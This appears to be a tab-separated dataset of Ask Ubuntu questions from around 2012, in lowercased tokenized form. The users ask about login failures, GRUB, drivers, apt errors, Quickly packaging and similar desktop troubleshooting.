159878	can not login to newly created user account	trying to switch accounts to my newly created account i get a black screen and then it takes me back to the main login screen after entering the correct password . upon logging into my previously existing account i get : '' system program problem detected '' details : executable path /usr/bin/xorg package : xserver-xorg-core 2:1.11.4-0ubuntu10.1 details : crash ... ( tons more , but no way to copy paste or save ) when i try to su su -l penner i get : no directory , logging in with home=/ i manually created the home directory and this error goes away but still no luck with the login . seems something has gone wrong with the user creation ? how can i correct this ?
159887	where did the startup-applications-preferences program go ?	i would like to change my startup-applications , where can i find the program startup-applications-preferences program ? i 'm using gnome-shell . i tried to reinstall it and to look for it by terminal ( apt and dpkg ) or synaptic but i could n't find it .
159895	need a pcie desktop graphics card for dual-monitor	i have a mid-2008 workstation with two hd monitors supporting hdmi and dvi inputs . since ubuntu 11.10 , i have experienced no end of trouble with my nvidia quadro nvs 290 in twinview dual-monitor output . others have similar desktop twinview woes . i want a new graphics card . previously i asked for a graphics card recommendation and response was nvidia geforce gts 450 ... but really i 'm looking for someone who has actually got a working dual-monitor desktop to tell me what card they use so i can get something that is known to work . so please , people who have no-issues with their 64-bit ubuntu 12.04 unity 3d desktop spread across two hd-resolution external monitors ( either dvi or hdmi connector ) , and who also run google chrome ( which throws a spanner due to its own gpu compositing ) ... please let me know what graphics card you have so i can buy one . gathering options these seem to be the nvidia cards featuring dual dvi . but they all seem to be gaming cards - what has dual-dvi , good support , but is not a massive gaming card ? nvidia gts 450 ( previously recommended ) - 2x dvi nvidia gtx 550 ti ( used by system76 ) - 2x dvi nvidia gt 430 ( used by system76 ) - 1xdvi , 1xhdmi nvidia gt 640 ( found on nvidia site ) - 1xdvi , 1xhdmi ( also gt 620 , gt 630 ) has anyone had a good desktop dual-monitor unity 3d experience with ati cards ? decision i 've decided to go with the geforce gt 620 , which is the successor to the gt 430 and gt 530 in the performance ranking . i do n't want gaming power , and the 4xx and 5xx chips seem to be out of stock , so i 'll just hold thumbs that the binary blob will handle it correctly because it 's a geforce chip instead of a quadro chip .
159898	what are some alternatives to jdownloader for 12.04 ?	i just added the jdownloader ppa and installed the app but when i launch the app i get a jupdate box telling me to download which it never does so i 'm looking for a good lightweight alternative to jdownloader . any help
159903	is vmware 8 compatible with ubuntu 12.04 ?	i am using vmware 8.0.4 and want to install ubuntu 12.04 , but i have not been able to do so successfully . can you suggest compatible versions of vmware and ubuntu ? in particular , will ubuntu 12.04 work with vmware 8 ?
159904	caps lock control	at our site we generally prefer the key to the left of the `` a '' to be control , and we do n't need a caps lock key . on existing x.org configurations we use 'option `` xkboptions '' `` ctrl : nocaps '' ' to get this behaviour in x , which is usually good enough for us . on ubuntu 12.04 we have found this not to work . in addition to this , we have tried editing /etc/default/keyboard to contain 'xkboptions= '' ctrl : nocaps '' ' . this did n't appear to have an effect . we have observed that when an individual user configures this behaviour through system settings , ~/.gconf/desktop/gnome/peripherals/keyboard/kbd/ % gconf.xml appears to record the configuration . however , even for admin users , we have n't located the `` apply for all users '' ( or similar ) option in the config application . we would like to make caps lock act as a control key by default for our users . the most important requirements are that it works in x sessions started by gdm , and that individual users still have a way to override the setting for their own account . ideally , but less importantly , we would also favour solutions that work in all x sessions ( not just those started by gdm ) , and also on the console .
159918	ca n't dual boot ubuntu 12.04 and windows 7 on sony vaio s 15 ( 2012 )	i just bought my dad a new laptop for fathers day , a sony vaio s 15 ( the latest models from sony ) and he wants to dual boot ubuntu and windows 7 . i put ubuntu 12.04 on a usb drive and went to install it on the computer , but when i got into the partition part of the install there was no option to dual boot . only to delete everything and install ubuntu or 'other ' . i installed using the 'other ' feature by manually partitioning , however once i installed it the computer would n't ever go to grub . from inside windows i used easy bcd to try and fix the boot loader so it would give the option to boot into windows 7 or ubuntu 12.04 , but it could n't detect any operating systems on the computer ( not even windows ) . is it not possible to dual boot on the latest sony vaios , or is there a workaround for this ?
159921	why ca n't i ping `` http : /ushou-appeng01/ufm/ ... . '' ?	i am not able to ping http : //ushou-appeng01/ufm/firmware/packages in kubuntu 10.04 . this link is accessed in my ltib file . when i tried to ping this link from the bash shell , it gave me a `` host not found '' error . could you please tell me what is wrong here ?
159925	how to read the password from variable ?	i am trying to move my file to another system which is located in some other place , with this command : rsync -avrz src destination it works fine . but what i need is to put this command in shell script and run it like : # ! /bin/sh rsync -avrz srcfilelocation destination when it runs , it asks for the destination system password . i know that password and give it manually . now i have decided to assign the password to an environment variable , like pswd= '' destination system password '' . i need my shell script to read the password from this variable . how can i write a script to do this ?
159929	all partitions disappeared after a power outage	after a power outage , my partitions wo n't appear anymore on my ubuntu 12.04 but everything is fine on windows . all are ntfs partitions on 2 different hard drives and i can see them typing sudo fdisk -l. it 's certainly a classical problem but i 'm new here ... thanks .
159930	how can i disable `` previous linux version '' entries in the grub menu	i know that , most of the user liked the new grub2 feature of hiding old kernel entries in the menu item `` previous linux version '' . but , i do n't want to go to that menu for booting a previous kernel version . my question is `` how can i disable this feature '' ? i.e , `` how can i force grub2 to include all kernel version entries in the menu ? ''
159934	dpkg with no shell	how to run dpkg without shell ? here is my problem : i made and autorun.sh script in my usb key . to run this script , i created rules in /etc/udev/rules/49-usb-rules : subsystem== '' block '' , kernel== '' sd*1 '' , action== '' add '' , run+= '' /bin/sh /opt/local/usb_autorun.sh % e { id_fs_label } % e { id_fs_uuid } '' /opt/local/usb_autorun.sh calls my autorun.sh located on my usb key . it works well , but in that script , i try to run dpkg -i to install a debian archive and it fails . after some research , i tried to run : at -f /media/usb-key/autorun.sh -v 12:00 and i had the same problem . so i saw that dpkg seems to need a shell to be run . i tried `dpkg-reconfigure -- frontend=dialog debconf `` and set up non-interactive , but it did n't seems to work neither . how can i run dpkg -i from my autorun.sh script ? here is my autorun.sh ( on the usb key ) : # ! /bin/bash touch /tmp/fic echo `` installation du firmware '' > /tmp/fic dir= $ ( readlink -f `` $ ( dirname `` $ 0 '' ) '' ) export path= $ path /usr/bin/dpkg -i -- force-all $ dir/radiolive.deb > > /tmp/fic 2 > & 1 echo `` fin '' > > /tmp/fic here is my usb_autorun.sh ( on my hard-drive ) : # ! /bin/bash script=autorun.sh autorun ( ) { if [ -z $ { 1 } ] ; then file=/media/ $ { 2 } / $ { script } else file=/media/ $ { 1 } / $ { script } fi sleep 10 if [ -f $ { file } ] ; then /bin/bash $ { file } fi } autorun $ @ &
159939	how to install sqlplus ?	i tried installing sqlplus by following the instruction from here . i 'm still getting : sqlplus : command not found when i do sqlplus from my terminal . i 'm an novice in ubuntu and i use ubuntu 12.04 .
159940	how do i use a quickly community template ( e.g . ubuntu-application-qt ) ?	i would like to look at the qt and qtquick templates for quickly . the documentation for them seems to be non-existent . but i found a previously answered question ( http : //askubuntu.com/questions/25671/quickly-template-for-pyqt ? lq=1 ) with an answer that links to the launchpad project with community templates . after clicking around for a while , i stumbled on a ppa that i could follow directions to add in the development team on launchpad . after i added the ppa , i could successfully install the package with sudo aptitude install quickly-community-templates-common . however , it seems that i still only have the three default templates available from quickly : $ quickly create ubuntu-application-qt myproject error : no template specified for command create . usage : quickly create < template > < project-name > candidate templates are : ubuntu-application , ubuntu-cli , ubuntu-flash-game i went to launchpad and put this up as a bug . but they have a bug from 16/6 that still is n't answered , so it does n't seem to be much activity there . and i 'm not sure if this is a bug or if it 's just a result of me not understanding anything about how to use this since there is no documentation . so i 'm asking the question here instead : how do i use these templates for quickly ?
159942	can i extract a printer driver from a package ?	i have a printer ( xerox phaser 3140 ) that 's working perfectly under precise with default drivers from ubuntu . however , when i try to connect it to a netbook running lubuntu precise , this same driver is missing ( also on debian on raspberry pi ) . i figure this is proprietary software . is there a way to extract the driver from my working ubuntu instalation and move it to the ubuntu install ?
159947	quickly ignores subfolder	i have a problem with packaging quickly . i have a project foo : foo/ foo/bar/ foo_lib/ data/ when i run quickly package -- extras & & file-roller ../*deb i always miss /opt/extras.ubuntu.com/foo/foo/bar in the deb-file . any ideas ?
159950	create a pseudo command for lampp xampp	how do i create a psuedo command for the terminal ? the basic command for lampp is : sudo /opt/lampp/lampp start but i do n't want to type this every time so can i create a psuedo for this so i can just type lampp start lampp startssl lampp stop and so forth so that lampp invokes sudo /opt/lampp/lampp .
159954	how can i recover ubuntu after accidentally installing another distribution over it ?	i had ubuntu 10.10 with a sound card problem , and decided to install another distribution to solve it . i tried to tell the new distro to install to another partition , but i must have made a mistake because it installed over my existing ubuntu . is there a way to recover all my data ? i 'm especially interested in the contents of my former home directory .
159955	what 's the naming convention for ngettext short name ?	gettext.gettext is imported as _ : from gettext import gettext as _ it 's some naming convention , right ? what 's the equivalent for gettext.ngettext ? __ ?
159957	how to make apport always open a bug report page ?	since i updated to 12.04 apport sends crash reports to the server silently without opening a bug report page on launchpad while i 'd like to track this reports statuses . how can i achieve this ?
159958	brightness adjustment impossible after hibernation ( macbookair 3.2 , ubuntu 12.04 )	after waking my computer up from hibernation ( close lid , open lid ) i loose the ability to adjust the brightness with the f-keys and in the settings . it 's the only problem i have with ubuntu on my macbook 3.2 : ( please help !
159960	creating a bootable cd based on ubuntu server	note : bootable here refers to an installation cd , not to the el torito bootable cd standard if narrowly construed , or to a live cd if widely construed . what tools exist to create a bootable cd based on ubuntu 12.04 ? unlike the live cd used for the desktop edition , the server edition does n't use casper and that 's exactly what i want . i.e . this question is not about a live cd ! i have read installcdcustomization , but that only covers preseeding , adding modules etc . what i would like to achieve is rather to build a bootable cd from scratch , preferably based on the kernel of my running system , the bash and other binaries from that running system . i know how to preseed my own installation cd , so i 'm comfortable with the tools involved there . however , that skips important parts such as creating the directory structure that is expected on a bootable cd . and that 's what i 'm looking for . i guess the question could be summed up as : what tools are the ubuntu build masters using to author the alternate and server installation cds and where can i find documentation for these ? i would prefer doing this on the terminal ( because that 's how i run the ubuntu server installations themselves ) . but if i need a second machine with gui to do it , i can certainly live with that .
159961	restoring my original keyboard mapping without logging on	i used xmodmap to remap some keys . i followed directions to restart . now , i ca n't log in . how can i restore my previous keyboard mapping ?
159962	how can i use d-link dwm-156 in ubuntu 11.10 ?	i cant use d-link dwm-156 in ubuntu 11.10
159963	download on ubuntu terminal proceeding or not	i had put my computer on hibernate mode coz my internet connection had stopped while download was taking place.now the internet is working.how do i check whether it is downloading ? or do i have to do something to resume the download process ?
159973	fix grub.cfg to boot ubuntu	i screwed up the grub.cfg file in ubuntu and now i cant boot to that partition . what do i need to put in the file to be able to boot from that partition ?
159976	how to uninstall / remove ubuntu 12.04 from live media	i need to uninstall and reinstall ubuntu , but when i open it , the only options that come up are demo mode and learn more , nothing about uninstalling .
159980	epson sx115 all-in-one printer scanner not recognized	i am very new to ubuntu . i have an epson sx115 all-in-one printer . i use the ubuntu 12.04 os . i can print in it but how do i make the scanner on the printer work ?
159986	show available/installed version in the output of aptitude search	is it possible to make aptitude show the available/installed version of a package in an output of aptitude search mypackage ? i know that i can show the version via aptitude show mypackage , but i want it it to appear also in the output of an aptitude search .
159988	places dropdown > network > ftp= opens in firefox not nautilius	ubuntu 10.10 user upgraded to 12.04 lts . gnome 3.2.1 with fallback experience . opening a ftp ( not ssh or sftp , just ftp ) from places drop down will open ftp in firefox ( which is n't even the default browser on my computer ) . this is not an issue within nautilus side bar , it works correctly there . only from the places dropdown is there an issue . i see in arch forums they have a bug for it fs # 23564 , wondering if we do ? or , if there is some settings i 'm missing ? new to gnome 3 .
159990	bash script not working as required with xbindkeys	i made a simple bash script to display a notification whenever my capslock key is pressed . it works fine when i call it like bash capsnotify.sh . the problem now is when i bind my above script to capslock key using xbindkeys tool it does n't work as required . it shows a notification caps on when my caps is on but it does n't show caps off notification when my caps is off instead it again shows the caps on notification . capsnotify.sh # ! /bin/bash value= $ ( xset -q | awk '/caps/ { print $ 4 } ' ) if [ `` $ value '' == `` on '' ] then notify-send `` caps on '' elif [ `` $ value '' == `` off '' ] then notify-send `` caps off '' fi .xbindkeysrc '' bash /home/ranveer/capsnotify.sh '' m:0x2 + c:66 so , the problem is after binding my caps lock key on both events ( on/off ) it shows caps on notification .
159992	how to mount ext4 partition ?	how do i mount an ext4 partition as my user account so i would n't require root access to r/w on it ? i used -o uid=flint , gid=flint on the mount command but i keep getting mount : wrong fs type , bad option , bad superblock on /dev/sda7 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so another thing , i want avoid using udisks for now as it does n't let me mount to my specified mount point name .
159993	ubuntu 12.04 installation freezes at 64 %	i have now tried five times it install ubuntu . once in normal mode , three times in demo mode , and one in safe graphic mode , but they all freeze at 64 % .
159997	double x-screens on one monitor	i have two monitors connected currently , my laptop display and an old dell monitor . for some reason one monitor ( the dell ) has double everything ( it will make sense when you see the image ) . i think it came about when one day i tried using separate x-screen instead of just twin view for a specific reason i do n't remember why ( i was trying to get the menu bar to show on my laptop monitor instead of the dell i believe , it only shows up on the left-most monitor it seems ) but anyhow i was wondering if anyone can help me fix this issue . please let me know if any additional information is required in order to fix .
159998	usb not recognized in virtualbox - ubuntu 12.04 host - windows 7 guest	i have ubuntu 12.04 host and can not detect usb devices on windows 7 guest on virtualbox ( guest-addon is installed ) , though i configured vboxusers group and enabled it for my user account and still can not detect any device : (
159999	adding another device to my ubuntu one account	how can i add my desktop pc to my ubuntu one account ? i can not seem to get it to list under `` devices '' along with my laptop and net-book . i have several folders to sync between the three computers .
160001	i need to install my sql server 5.1 where there is no internet connection	please kindly help me at the following issue . currently i do n't have an internet connection and i need to install mysql server on ubuntu 11.04 without any rpm packages . i have only the tar file with me . it has been extracted to the particular area . so what are the command to be used ?
160004	windows system ( bootloader ) partition accidently deleted during multiple installs	after experimenting with multiple variations of backtrack and xbmcbuntu variations of ubuntu with dual boot successfully , my windows partition became unrecognizable to grub . i used my windows boot cd to try to correct the problem . however , i deleted all partitions except for the nfts one that contains my old windows install . ( and , merged all other ones into that in hopes of getting back to the windows boot loader and out of grub ) now , all i get is a grub command prompt when i try and boot the system ( how ? ? ? - i thought i deleted grub ) and , now the windows boot disc does n't even recognize the install . i 've tried trk to try and resolve the problem . though i must admit ignorance in correctly using this utility . i 've searched for other answers to this problem . any help would be much appreciated .
160010	gtk.messagedialog window parameter problems	i 'm in a deeply nested class ( which inherits from gtk.box ) and i need to get a reference to the gtkwindow i 'm in to pass to a call to gtk.messagedialog ( ) yet i cant seem to find a reference to it . i have tried self.props.window as well as self.get_parent_window ( ) with no avail . everything i try to do leads to the following error : typeerror : expected gtk.window , but got gobjectmeta code snippet is as follows : def on_tb_del_clicked ( self , widget ) : question = _ ( `` are you sure you want to do this ? '' ) win = self.get_parent_window ( ) dialog = gtk.messagedialog ( win,0 , gtk.messagetype.question , gtk.buttonstype.yes_no , question ) # < < exception response = dialog.run ( ) please help : )
160015	what is the simplest way to check to see if webmin is installed ?	i dug up an old server that is only running cli , and ca n't seem to remember if webmin was installed on the machine or not . i normally implement it on all machines , but it does n't seem like it 's working on this one . is there a quick command to check to see if it 's installed or a directory that webmin has to exist ?
160016	what does this launchpad error building my package mean ?	hello i submitted my source package to ppa via command quickly submitubuntu 1.1 myppa this successfully submit my application to my ppa , but buildserver always giving errors , here is the buildlog link can anyone help me in that ? i also tried with localbuild with command , quickly package -- extras it is building .deb file successfully .
160017	how to do i connect a vmware guest to the internet ?	i use winxp on vmware inside ubuntu 12.04 . need connect vmware xp box to internet with some reliable algorithm through host-only , nat , or with bridged connection . please suggest me any right way strategy for 1 network card ( atheros ) .
160018	video/graphic render issue with high quality ( hd )	i have dell n5010 with 512 mb graphics ( ati mobility radeon hd 5470 ) , 4gb ram , i3 2.53ghz , 15'4 '' led display , ubuntu 11.10 . when i open a hd video/movie with vlc , rhytmbox , or media player ( default ) it hangs . i think this is a driver problem . is there any specific driver for dell n5010 , i need ati mobility radeon hd 5470 driver for ubuntu ?
160025	no public key gpg error when submitting quickly application	i try to submit my app with the command in the title , but the build failed : error message : w : gpg error : http : //ppa.launchpad.net precise release : the following signatures could n't be verified because the public key is not available : no_pubkey * * is my key ( do n't know it is safe to share it ) if i run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys ****** it is said my key is n't change ( so do n't need to add it again ) . any idea ?
160026	how submit a project to ubuntu software center with quickly	which are all the steps ? i 'm going to reply below : )
160030	custom scrips into quickly project	how can i add my custom .py file to a quickly project ? i 'm porting my actual , from scratch project and i have two python scripts : virtuam and vui.py . i copied vui.py to the virtuam folder and tried this : from virtuam import vui but not working . so , where can i copy it ? and how do i import it ?
160036	how do i disable acpi when booting ?	when i tried to install ubuntu from the live cd start menu , the screen became black with just a blinking cursor . i rebooted the pc and i chose the option acpi=off . then the installer started and ubuntu installed whitout problems . but when i reboot the pc now after the installation was complete the screen goes black again . i am new in the use of ubuntu .
160041	under the hood , what is quickly made of ?	under the hood , what is quickly made of ? it 's a wrapper to python ? it 's a compiled language ? it 's portable ? what about the architecture and the design ?
160045	will installing ubuntu erase my existing os ?	when installing ubuntu does it erase the other o.s . ?
160048	how to force ubuntu to access the internet only through a vpn and disable it when disconnected ?	due to privacy issues i 'd like ubuntu to allow applications to send traffic to the internet only when the vpn connection is established . the thing is that there are some applications like skype or dropbox that will reconnect after the vpn connection is dropped for some reason . and i do n't want that , i want them not to be able to . any way to do this ?
160052	apt dependency problem : packages in a ppa do not correctly depend on each other	i 'm trying to install wireshark 1.6 on ubuntu lucid lynx from ppa ( n-muench/programs-ppa2 ) . the libwsutil1 version is named 1.6.0-1~ppa1 so it should satisfy libwiretap1 dependency that needs version 1.6.0-1 ; but it does n't ! ! i tried this : sudo apt-get install libwiretap1 and this : sudo apt-get -fm install libwiretap1 both responded this : the following packages have unmet dependencies : libwiretap1 : depends : libwsutil1 ( > = 1.6.0-1 ) but 1.6.0-1~ppa1 is to be installed e : broken packages ( notice that the ~ppa1 postfix seems to be the problem ! ) what can i do ?
160057	ubuntu 32bit vs 64bit	according to my specs , would 32bit ubuntu 12.04 be better ? intel core i5 470um dual core clocked at 1.33ghz 12.5 '' hd led lcd screen at 1366 by 768 4gb ddr3 @ 1333 mhz ram integrated intel hd graphics card 4 cell battery with 3150mah it comes loaded windows 7 home premium 64-bit , it runs fine on that but my ubuntu 12.04 runs slower than it and i do n't understand why . ( it definitely has decent specs to run even a 64-bit operating system and do some gaming . granted i know it 's not the best but for a laptop it does the job so ubuntu should work especially since it 's said to make older units with worse specs run even better . ) boot up is fine , its program response time i believe , once i 'm in the actual os , it lags , apps stop working , take forever to load up some apps . flash is also not the most optimized , it does n't run all that well . my task manager never really loads up either so i was also wondering if there is a task manager out there i could install . anyway should i downgrade to 32bit ?
160060	can i patch the ppc 12.04 kernel to allow older ati drivers to install ?	right now , with a powermac g5 , the only way to install the graphics driver from the ati binaries would be to patch the kernel , for my radeon 9600 is only supported with the 9.3 installer , while the 12.6 has no effect . my current issue is that the new kernel with an old driver is preventing the install . is there a way to correctly patch this without issues ?
160063	how can i add a progress bar to md5deep ?	i would like to implement a command line progress bar using pipe viewer or dialog gui tool for the md5deep command . i tried the following : pv file.md5 | md5deep -x - -r destination i was not able to get the progress bar working . there is an option in md5deep where you can get the eta by doing the following : md5deep -ex file.md5 -r destination this option determines the eta for each file and it is not possible to determine how long it might take for the entire directory . any suggestions to implement a progress would be appreciated
160064	how can i install opendtect ?	the opendtect project is open source and still i have problems with the installation . when i run the installer , it does open a terminal for a second and then disappears . it has no manuals and few topics , the installation manual is not clear at all either . so , how do i install opendtect in ubuntu 12.04 ?
160070	to make or not to make ... python-nautilus a dependency ?	that is the question ! okay , all silliness aside , i really am forced to make a difficult decision here . my application is written in c++ and allows other scripts to invoke methods via xml-rpc . one of these scripts is a nautilus extension written in python . the extension is packaged with the rest of the application and copied to the appropriate place when installed ( /usr/share/nautilus-python/extensions ) . now the problem is that the nautilus extension requires the python-nautilus package to be installed to be operational . so therefore i have three options : make the python-nautilus package a dependency . this option will ensure that anyone who installs my package will be able to use the nautilus extension . however , this option will not be attractive to xfce or kde users - a ton of python-nautilus 's dependencies will be installed on their machines and take up a lot of space - even if they never use nautilus . put the python-nautilus package in the suggests : or recommends : field . this option provides the end-user with a way to avoid installing the python-nautilus package ( by providing the -- no-install-suggests or -- no-install-recommends argument to apt-get ) . however , this wo n't work when the user installs the package in the software center . ( i always get mixed up as to which of those two fields are installed by default . ) prompt the user when the application is installed or first launched . this option is more complicated than the others but offers the best compromise between making it easy for the user to install python-nautilus ( without going into a technical explanation ) and not installing it when the user does n't need it ( or want it ) . i guess the best way to implement this is a simple prompt that invokes apt-get if the user would like the package installed . do n't install the package at all . this option ensures that nobody has python-nautilus installed on their machine unless they want it . however , this also means that my nautilus extension will simply not run on the end-user 's machine unless they manually install the package . which of these options seems the best choice ? have i missed any pros and cons for each of the options ?
160072	integrated graphics hdmi audio devices are missing	i have just bought a new computer to use as an htpc with ubuntu 12.04 64-bit , but i ca n't get hdmi audio to work . i am using the integrated graphics in an intel i3-2120 cpu and the motherboard is an asus p8h61-m lx2 . the tv is connected to the motherboard 's dvi-d port via an hdmi-to-dvi cable . video works perfectly , but in alsa and pulseaudio i do n't see any option to select hdmi audio output . e.g . : $ aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : vt1708s digital [ vt1708s digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 2 : vt1708s hp [ vt1708s hp ] subdevices : 1/1 subdevice # 0 : subdevice # 0 other people that use integrated graphics and hdmi audio seem to have one or more `` intel hdmi '' devices listed , but i do n't , and none of the above produce sound over the hdmi cable . i 've tried playing with alsamixer , the sound settings , pavucontrol , hda analyzer , and the bios , but so far nothing has worked . help ! my full alsa-info.sh output is at http : //www.alsa-project.org/db/ ? f=96647290482cf72674c26fe9088b785116325737
160074	how to add ubuntu app showdown participation file to a submitted app ?	i have create a new app in myapps portal but it is not yet submitted for the review . how can i add the app showdown participation file before send the app to a reviewer ? or do i need to send the app for the review and then i 'll be able to fill the ubuntu app showdown participation file ?
160078	ubuntu 12.04 always hang when progressing installation on ibm t23	as in title . specifications : p3 1.13 with ram 1 gb . the last part i can access is `` who are you '' , and after i press continue , the error message appeared , only `` unsolveable problem '' , without specific message . anyone has similar problem ?
160082	ca n't boot ubuntu	i 've installed ubuntu using live cd . but when i turn my computer on , it starts windows 7 instead of giving me right to make a decision , which os i need to boot . i think i have some problems with grub - it is n't run .
160084	install indicator-cpufreq as a package through web	i have ubuntu 11.10 version and i have problem that i ca n't download packages from software center neither through command line due to proxy settings problem does anybody know if i can get this package through web dowloads ?
160089	how to get dropped files on unitys launcher in my quickly app ?	how do i get the file that i 've dropped on my programms icon in the launcer in my quiklcy programm ? i already added the mime types in my .desktop file and my programm can accept commandline variables , but when i drop a file on the icon in launcher it does n't get it .
160100	how to import qt app into quickly on 10.04 ?	how to import my qt app into quickly ? the goal of this is to package my qt app using quickly .
160105	firefox installation under 12.04 server	i am new to linux and ubuntu 12.04 lts server . can anyone please help , how can i run firefox under command prompt
160111	where should i place my sqlite database for proper packaging ?	i built my first application with quickly uses a sqlite database file . it contains all the settings of the program . while developing i simply put it into the root folder of the app . quickly package did complain about the place , so i first removed it into the media folder . then quickly could finish packaging . as expected , after installation , the settings database landed in /usr/share/app/media folder . thats not a good place for this i would say . i 'd rather see this in /etc/app/ for example . and if i would do so , would it break the rules of the app showdown ? so where should i place it in my development environment . maybe i can place the whole structure in the debian folder ?
160114	error when importing pynotify	when i add import pynotify and try to run my app i get /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk with another example i do n't get the error ...
160116	classification and search software for linking relevant content on local machine to curriculum	what i 'm thinking about is basically a classification system , for use in classifying educational content such as videos , pdfs , wikipedia pages , and also local applications and linking it all to educational courses to make it easy to search for . so say two schools are training people in different courses , but have the exact same broad range of educational content on their computers . the content in a big variety of forms . we would be able to define a simple outline of a maths course . perhaps just by creating a set of tags or nested categories representing the different topics covered . then we could classify any relevant content we have by linking it to the tags/categories . we could do the same for the other school 's course . a user would be able to browse and search through all the different content of every type from one interface . allowing them to easily find learning or teaching materials . there would ideally be a fair amount of flexibility and overlap in the system . so if we say that one course is the maths section of a certain country 's curriculum , then a user could find the content relating to it by browsing by country , then subject , then grade level ( advanced/beginner ) and then individual mathematical topic ( depending how detailed the classifications are ) , but they could also browse first by grade level , then subject , and see all the maths content for every country . it would also be great if content could be indexed and searched . and this would all have to be done locally . although i 've mentioned courses and schools a lot , the software would basically just be classification and search/browsing , not course or curriculum management software . is there any software that would be able to build up this sort of structue ? i 'm sure something similar could be achieved through tools like sharepoint but this would be run on individual machines , not on a network so i 'd like a ubuntu desktop app . i have a feeling i 'm missing something obvious here or just thinking about this in entirely the wrong way ... edit : the machines are currently running edubuntu with some extra software and content added . also , if a tool for this does not exist , then development is a possibility . in fact , i 'd rather like to take it on as a project for my final year in college , but i wanted to see if there 's any existing software that could solve the problem first . edit number 2 : looking around a bit more i see more similarities between what i want and various tools like existing enterprise content management systems , document management systems and also web cms . all of them seem like fairly weighty options though and in the case of things like the document management systems i 'm not sure how simple they can be made to use . do you think any of them would be flexible enough to give this level of classification and also have a really simple end-user interface . of course it would still be much better to have a proper desktop application than running a webserver , database server and app on top , as these would be very low spec computers . this would have to be usable by people with very low levels of computer literacy ( third world deployments )
160118	ubuntu : ca n't connect to the wireless network	i ca n't connect to the wireless network on ubuntu . i 'm using vmware to use ubuntu on windows . i ca n't add the wireless network adapter to the virtual machine settings . i think that might be the reason ubuntu is not able to identify the wireless network adapter on its list of hardware . if anyone knows why ubuntu does n't recognize the wireless adapter please reply to this post . your help is much appreciated . thanks !
160119	simple messaging queue for inter-app communication over internet	i 'm looking to organize simple messaging queue for inter-app communications . the applications will be running on different pc 's connected thought ubuntu one service . basically i thought to use desktopcouch , but i just found that canonical dropped couchdb support from u1 and i 'm afraid it wo n't sync anymore . i also found u1db which is counterpart of desktopcouch features , but it is not yet available in 12.04 archives . am i missing anything ? : )
160125	how to install the intel速 82845g graphics controller ubuntu 12.04	in the page : http : //downloadcenter.intel.com/searchresult.aspx ? lang=eng & productfamily=graphics & productline=desktop+graphics+drivers & productproduct=intel % c2 % ae+82845g+graphics+controller format files are rpm and gz they are not designed for ubuntu
160130	how can two people play minecraft on one laptop with external monitor attached ?	i want two people to play minecraft at the same time on my laptop as follows : ( internalmonitor ) external-dualhead-monitor laptop ( internal mouse , keyboard ) external-mouse-keyboard i do n't care how , but that 's what i want . thanks !
160136	keyboard layout always resets to us on reboot	so , on each reboot my keyboard always resets to us ! sudo dpkg-reconfigure keyboard-configuration gives temporary relief . is there a way to make it permanent ? i tried : sudo dpkg-reconfigure console-setup this did not work , and on reboot gnome3 was no longer responsive so i am back to gnome classic ... . my other grumbles are here : https : //plus.google.com/113037534656133512306/posts/iwju4zzvvdw please stop breaking ubuntu , it used to be great now its as bad as windows used to be ... .. which now only costs âł70 and is no where near as high maintenance .
160141	why wo n't apt-get install anything after i deleted its cached lists ?	recently i had a problem with the update-manager and search for a solution . on my search i found a post , where someone had the same problem and as solution they told him he should run this command on the terminal : sudo rm /var/lib/apt/lists/* i also run this , and the update-manager worked again . but now , i noticed that apt-get wo n't install anything . i wanted to install rvm ( for ruby ) and therefore i needed a few packages ( build-essential and curl to be precise ) . but if i tried to install them , i always get the message that there is no installcandidate for that package ... . what can i do to get apt-get working again ?
160146	where can i find blueprints and a roadmap for multiarch in 12.10 ?	multiarch came a long way in 12.04 . however , the 32-bit release is still recommended for download and some 32-bit debs ( google chrome for example ) still lack dependencies . i have not been able to find any blueprints dealing with multiarch for 12.10 . are there plans for improving this feature in the works or is it considered effectively complete since ia32-libs is replaced ?
160147	how can i remove unmounted sd card icons from my desktop ?	i have been using some audio utilities in ubuntu 11.10 to tweak .mp3 files on my phone ( motorola photon 4g ) . i connect via usb ... both my phone and the internal sd card are mounted as two separate drives . the sd card has an unusual drive name with some odd characters . when i 'm finished , i unmount my phone ( or `` safely remove drive '' ) , but the sd card ca n't be unmounted . i 've mounted and unmounted my phone on 4 occasions now , and there are now 4 sd card drive icons that i ca n't remove from the desktop . i tried using the gconf-editor/apps/nautilus/desktop trick to make drives invisible and it 's not working . right-clicking on the icons and selecting `` unmount '' produced the following error message ; ( i ca n't type the unusual drive name characters ... replaced with xxx ) unable to unmount xxx umount : /media/xxx is not mounted ( according to mtab ) how can i remove the unwanted icons from the desktop and is there a method for avoiding this problem in the future ? thanks !
